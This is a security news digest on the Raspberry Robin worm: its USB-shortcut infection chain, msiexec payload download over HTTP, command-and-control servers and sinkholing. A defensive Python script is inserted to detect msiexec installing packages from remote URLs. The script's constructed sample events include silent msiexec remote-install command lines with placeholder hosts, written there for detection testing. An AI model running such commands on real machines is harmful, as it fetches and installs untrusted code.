Numerous threat actors could repurpose Raspberry Robin, also known as QNAP worm, for their own attacks, reports The Hacker News.
Raspberry Robin, which has been attributed to DEV-0856, was discovered by SEKOIA researchers to have at least eight Linode-based virtual private servers acting as a second command-and-control layer on top of compromised QNAP network-attached storage devices.
This infrastructure supports an attack chain that begins when a Windows shortcut file on an inserted USB drive is launched; the shortcut invokes the msiexec utility, which then downloads the primary obfuscated Raspberry Robin payload. Researchers noted that because msiexec retrieves the malware through plain HTTP requests, those requests could be hijacked to deliver other rogue MSI payloads.
"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," said SEKOIA, which added that the Raspberry Robin domain could still be reused for other malicious activities.
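A defender can hunt for the msiexec-over-HTTP stage described above in process-creation telemetry. The following is an added example, not code from the article or from SEKOIA; the event records and their field names are constructed for illustration and do not follow any real EDR schema, and the `example.invalid` URLs are placeholders.

```python
from __future__ import annotations
import re

# Constructed sample process-creation events (hypothetical field names).
# Events 0 and 3 imitate msiexec fetching an installer from a remote URL
# after a user-launched parent; events 1 and 2 are benign local activity.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /q /i http://example.invalid/aB3/file.msi"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\setup.msi /qn"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /package https://example.invalid/pkg.msi"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# /q, /qn, /qb, /quiet ...: a silent install hides the installer UI from the user
QUIET_RE = re.compile(r"(?:^|\s)/q(?:[nbrf]|uiet)?(?=\s|$)", re.IGNORECASE)
# Parents typical of a user double-clicking a shortcut or typing a command
USER_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify_msiexec(event: dict) -> list[str]:
    """Return the suspicious traits of one event; empty unless msiexec is
    installing a package from a remote URL."""
    if basename(event["image"]) != "msiexec.exe":
        return []
    if not URL_RE.search(event["cmdline"]):
        return []  # local .msi installs are routine admin activity
    reasons = ["remote_url"]
    if QUIET_RE.search(event["cmdline"]):
        reasons.append("quiet_install")
    if basename(event["parent"]) in USER_PARENTS:
        reasons.append("user_launched_parent")
    return reasons

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event matching the heuristic."""
    return [(i, r) for i, e in enumerate(events) if (r := classify_msiexec(e))]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

Tune the parent list and quiet-flag handling to your environment; software deployment tools that legitimately pass URLs to msiexec should be allow-listed by parent image rather than by dropping the URL check.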
Ransomware operations have increasingly turned to data extortion instead of data encryption, a shift in attack techniques fueled by improved ransomware detection systems and stronger law enforcement crackdowns on ransomware gangs, TechRepublic reports.